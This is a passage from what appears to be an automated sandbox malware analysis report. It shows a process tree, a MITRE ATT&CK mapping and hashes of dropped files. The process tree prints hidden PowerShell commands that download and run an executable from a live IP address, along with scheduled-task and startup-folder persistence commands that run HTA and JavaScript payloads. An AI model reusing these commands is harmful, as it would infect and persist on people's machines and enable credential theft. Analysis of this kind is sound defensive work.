                                                                                                                                                        schtasks /create /tn X5h0GmaukKd /tr "mshta C:\Users\Admin\AppData\Local\Temp\frOuWs6uA.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                        6⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:6092
                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                      mshta C:\Users\Admin\AppData\Local\Temp\frOuWs6uA.hta
                                                                                                                                                      5⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:3760
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'J46J88RQLXWCCWONAXKDPOKKLHFRFQ96.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                        6⤵
                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        • Downloads MZ/PE file
                                                                                                                                                        PID:2432
                                                                                                                                                        • C:\Users\Admin\AppData\Local\TempJ46J88RQLXWCCWONAXKDPOKKLHFRFQ96.EXE
                                                                                                                                                          "C:\Users\Admin\AppData\Local\TempJ46J88RQLXWCCWONAXKDPOKKLHFRFQ96.EXE"
                                                                                                                                                          7⤵
                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:4288
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10125780121\am_no.cmd" "
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4512
                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                        timeout /t 2
                                                                                                                                                        5⤵
                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                        PID:5956
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:5092
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                          6⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:6012
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:5400
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                                                                                          6⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          PID:4144
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:3776
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                                                                                          6⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:4692
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /create /tn "FkRsZmaq58H" /tr "mshta \"C:\Temp\iEDVG9loa.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                        5⤵
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:5944
                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                        mshta "C:\Temp\iEDVG9loa.hta"
                                                                                                                                                        5⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:1472
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                          6⤵
                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          • Downloads MZ/PE file
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:2672
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                                                                                            7⤵
                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:1264
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10125900101\GjThRAJ.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10125900101\GjThRAJ.exe"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:3904
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10126060101\220a009b82.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10126060101\220a009b82.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:2432
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10126070101\76007506d6.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10126070101\76007506d6.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:2352
                                                                                                                                                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Downloads MZ/PE file
                                                                                                                                                          PID:420
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10126080101\141bcc6f89.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10126080101\141bcc6f89.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:1136
                                                                                                                                                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:3516
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10126090101\6878bc60fb.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10126090101\6878bc60fb.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        PID:1928
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10126100101\b7e68b825b.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10126100101\b7e68b825b.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:768
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10126100101\b7e68b825b.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10126100101\b7e68b825b.exe"
                                                                                                                                                          5⤵
                                                                                                                                                            PID:3388
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10126100101\b7e68b825b.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10126100101\b7e68b825b.exe"
                                                                                                                                                            5⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:3908
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 808
                                                                                                                                                            5⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:5220
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10126110101\b85a7e632c.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10126110101\b85a7e632c.exe"
                                                                                                                                                          4⤵
                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                          • Downloads MZ/PE file
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:1456
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\X8Y1I2469Q1T8X2UHM87W.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\X8Y1I2469Q1T8X2UHM87W.exe"
                                                                                                                                                            5⤵
                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                            PID:4852
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                                                                                                                                                      2⤵
                                                                                                                                                        PID:5516
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                                                                                                                                                          3⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                          PID:2268
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
                                                                                                                                                        2⤵
                                                                                                                                                        • Drops startup file
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:2312
                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                                                                        2⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:5156
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2988 -ip 2988
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2804
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 692 -ip 692
                                                                                                                                                        1⤵
                                                                                                                                                          PID:1796
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2312 -ip 2312
                                                                                                                                                          1⤵
                                                                                                                                                            PID:4704
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            PID:3084
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2724 -ip 2724
                                                                                                                                                            1⤵
                                                                                                                                                              PID:900
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2724 -ip 2724
                                                                                                                                                              1⤵
                                                                                                                                                                PID:4824
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:1136
                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:1744
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:3560
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      PID:6000
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      PID:3900
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4188 -ip 4188
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:4964
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4244 -ip 4244
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:5228
                                                                                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:5460
                                                                                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5456
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                              PID:5320
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:2356
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 948 -ip 948
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:4332
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 6064 -ip 6064
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:2188
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5576 -ip 5576
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:5344
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 6112 -ip 6112
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:2364
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                      PID:1792
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:5484
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 768 -ip 768
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:4556
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5252 -ip 5252
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4600
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                            PID:2872
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:5836

                                                                                                                                                                                            Network

                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                            Reconnaissance

                                                                                                                                                                                            Resource Development

                                                                                                                                                                                            Initial Access

                                                                                                                                                                                            Execution

                                                                                                                                                                                            Command and Scripting Interpreter

                                                                                                                                                                                            1
                                                                                                                                                                                            T1059

                                                                                                                                                                                            PowerShell

                                                                                                                                                                                            1
                                                                                                                                                                                            T1059.001

                                                                                                                                                                                            Scheduled Task/Job

                                                                                                                                                                                            1
                                                                                                                                                                                            T1053

                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                            1
                                                                                                                                                                                            T1053.005

                                                                                                                                                                                            Persistence

                                                                                                                                                                                            Boot or Logon Autostart Execution

                                                                                                                                                                                            1
                                                                                                                                                                                            T1547

                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                            1
                                                                                                                                                                                            T1547.001

                                                                                                                                                                                            Modify Authentication Process

                                                                                                                                                                                            1
                                                                                                                                                                                            T1556

                                                                                                                                                                                            Scheduled Task/Job

                                                                                                                                                                                            1
                                                                                                                                                                                            T1053

                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                            1
                                                                                                                                                                                            T1053.005

                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                            Boot or Logon Autostart Execution

                                                                                                                                                                                            1
                                                                                                                                                                                            T1547

                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                            1
                                                                                                                                                                                            T1547.001

                                                                                                                                                                                            Scheduled Task/Job

                                                                                                                                                                                            1
                                                                                                                                                                                            T1053

                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                            1
                                                                                                                                                                                            T1053.005

                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                            Modify Authentication Process

                                                                                                                                                                                            1
                                                                                                                                                                                            T1556

                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                            2
                                                                                                                                                                                            T1112

                                                                                                                                                                                            Subvert Trust Controls

                                                                                                                                                                                            1
                                                                                                                                                                                            T1553

                                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                                            1
                                                                                                                                                                                            T1553.004

                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                            2
                                                                                                                                                                                            T1497

                                                                                                                                                                                            Credential Access

                                                                                                                                                                                            Credentials from Password Stores

                                                                                                                                                                                            1
                                                                                                                                                                                            T1555

                                                                                                                                                                                            Credentials from Web Browsers

                                                                                                                                                                                            1
                                                                                                                                                                                            T1555.003

                                                                                                                                                                                            Modify Authentication Process

                                                                                                                                                                                            1
                                                                                                                                                                                            T1556

                                                                                                                                                                                            Steal Web Session Cookie

                                                                                                                                                                                            1
                                                                                                                                                                                            T1539

                                                                                                                                                                                            Unsecured Credentials

                                                                                                                                                                                            6
                                                                                                                                                                                            T1552

                                                                                                                                                                                            Credentials In Files

                                                                                                                                                                                            5
                                                                                                                                                                                            T1552.001

                                                                                                                                                                                            Credentials in Registry

                                                                                                                                                                                            1
                                                                                                                                                                                            T1552.002

                                                                                                                                                                                            Discovery

                                                                                                                                                                                            Browser Information Discovery

                                                                                                                                                                                            1
                                                                                                                                                                                            T1217

                                                                                                                                                                                            Process Discovery

                                                                                                                                                                                            1
                                                                                                                                                                                            T1057

                                                                                                                                                                                            Query Registry

                                                                                                                                                                                            7
                                                                                                                                                                                            T1012

                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                            4
                                                                                                                                                                                            T1082

                                                                                                                                                                                            System Location Discovery

                                                                                                                                                                                            1
                                                                                                                                                                                            T1614

                                                                                                                                                                                            System Language Discovery

                                                                                                                                                                                            1
                                                                                                                                                                                            T1614.001

                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                            2
                                                                                                                                                                                            T1497

                                                                                                                                                                                            Lateral Movement

                                                                                                                                                                                            Collection

                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                            5
                                                                                                                                                                                            T1005

                                                                                                                                                                                            Email Collection

                                                                                                                                                                                            1
                                                                                                                                                                                            T1114

                                                                                                                                                                                            Command and Control

                                                                                                                                                                                            Exfiltration

                                                                                                                                                                                            Impact

                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                            Downloads

                                                                                                                                                                                            • C:\ProgramData\ECGDBAEH
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              112KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              87210e9e528a4ddb09c6b671937c79c6

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              3c75314714619f5b55e25769e0985d497f0062f2

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

                                                                                                                                                                                              Download Submit

                                                                                                                                                                                            • C:\ProgramData\IIJKJDAF
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              114KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              0c0344bc01423be55f3f75c03ba1e254

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              0c2964a33af7a4b00ceeec86726eba008a848bfa

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              4df081ef7d2877c7c8da1b7ce0b7f36fd9587980b91a9e46a6efb1c0aab75ff5

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              b3b7eeb6d1179197f4e321172bbcc22a4c7c5ca7c71118592f27c5634cbf43ae0f1ff48c0f74b42443975a6ddfb8a0290487c0417caf3bf44676fb8ca34aa9f5

                                                                                                                                                                                              Download Submit

                                                                                                                                                                                            • C:\ProgramData\KEGCBKKJDHJJJKECGIII
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              40KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              a182561a527f929489bf4b8f74f65cd7

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              8cd6866594759711ea1836e86a5b7ca64ee8911f

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                                                                                                                                                                                              Download Submit

                                                                                                                                                                                            • C:\ProgramData\mozglue.dll
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              593KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                              Download Submit

                                                                                                                                                                                            • C:\ProgramData\trqie\2nyc2n
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              10KB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              a2404526471e594b0822d2136189fcf4

                                                                                                                                                                                              SHA1

                                                                                                                                                                                              6c410d24fa4b728beb7831aa04194c690d7e4922

                                                                                                                                                                                              SHA256

                                                                                                                                                                                              6659320b8d3d9f006541b4adf61b5740dec660740ec6a602f52bb4afbe98d118

                                                                                                                                                                                              SHA512

                                                                                                                                                                                              3ecabf28d5b841b0287f9c17de9d45c9d00391277fa1676b6e09bb434e9afa98d649eb49995c7e6d2b0183fb4531ddb63aaeb6d790eff1f3dc45960719f46383

                                                                                                                                                                                              Download Submit

                                                                                                                                                                                            • C:\Users\Admin:.repos
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              1.2MB

                                                                                                                                                                                              MD5

                                                                                                                                                                                              af0a83dee36dd621e71d282ecd50e0f2

                                                                                                                                                                                              SHA1

